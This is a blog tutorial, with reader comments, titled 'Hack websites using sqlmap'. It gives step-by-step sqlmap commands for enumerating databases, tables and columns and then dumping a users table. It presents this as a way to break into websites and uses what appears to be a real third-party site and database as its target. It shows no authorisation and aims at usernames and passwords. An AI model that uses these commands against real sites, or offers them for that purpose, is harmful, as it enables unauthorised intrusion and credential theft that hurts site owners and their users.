SQL Injection part 4 -Hack websites using sqlmap

In my previous articles, i have shown you how we can hack websites using Simple SQL injection and Query based basic SQL injection and blind SQL injections. Today i am going to show you how we can hack websites using SQLmap. When manual methods donot let me hack the websites,then Sqlmap is my favourite tool. So before proceeding into this article i would like to suggest you to read my previous articles on SQLinjections, if you have missed them.

What is SQLMAP?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Things you require
1) BackTrack 5
2) A vulnerable website :p

The vulnerable link i am going to use is


Step by step Procedure to hack
First open Backtrack5 and then open SQLMAP. You can open SQLMAP by doing the following.
Applications-->backtrack-->Exploitation tools-->web exploitation tools-->sqlmap.

It opens your sqlmap console .

Scanning the URL and finding out the database names
Now i am going to scan the url using the following command.

./sqlmap.py -u  http://www.targetsite.com/item.php?id=200 –dbs

Here –u is for URL .
You can also scan the entire website by simply replacing the above URL with the website’s URL.
Now i am going to scan the link.

It has shown me a very good message that “GET parameter  “id” is vulnerable”.
And asked me to continue or stop. As i have already got a vulnerable parameter, i have stopped by pressing ‘N’. You can continue the scan if you want.

Finding out table names
Great..!! We got the database names. Now we need to find out the table and column names. As information_schema is for metadata, i am going with the database “waterufo_net”.
The following query gives me the table names.

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net

Here –D is to specify the name of the database.

Finding out column names
Fine.. Now we got 6 tables. As we are always interested in usernames and passwords, lets move on to the fl_users  table and find the column names in that table.
So we use the following query

./sqlmap.py -u http://www.targetsite.com/item.php?id=200 --columns -T fl_users -D waterufo_net

Here -T is for tablename.

Retrieving Data
We got all the columns from the table fl_users. Now we have to retrieve  the data from the database. For that we need to write the following query. We are just adding –dump to the above query.

./sqlmap.py -u http://www.targetsite.com/item.php?id=200 --columns -T fl_users -D waterufo_net –dump

We got all the data we want. I hope you know what to do now. If you don’t, please read my previous articles on SQL injections.
Hope you liked this article, feel free to leave your comments for further doubts and clarifications.
About the Guest Author:
This article is written by Mr Srinivas, He owns Hackinginception where he writes articles related to hacking .If your interested in writing a guest post @Hackaholic please contact me

Subscribe to Hackaholic

Enjoyed this article?
Subscribe to "Hackaholic"and get daily
updates in your inbox for free!

Related Posts Plugin for WordPress, Blogger...




This is Really Great and Thanks a Lot!
But when I try for sqlmap it says infinite redirect loop detected please provide missing parameters
What to do?


Thank you for the detailed post on how to attack. That was the one thing my seminar project was missing.

edris mateso said on August 27, 2013 at 12:32 PM :

i got a error unable to receive entries from database


Use the form below to comment. No spam please!!!

© 101hacker | Design by Mukund edited by John
Powered by Blogger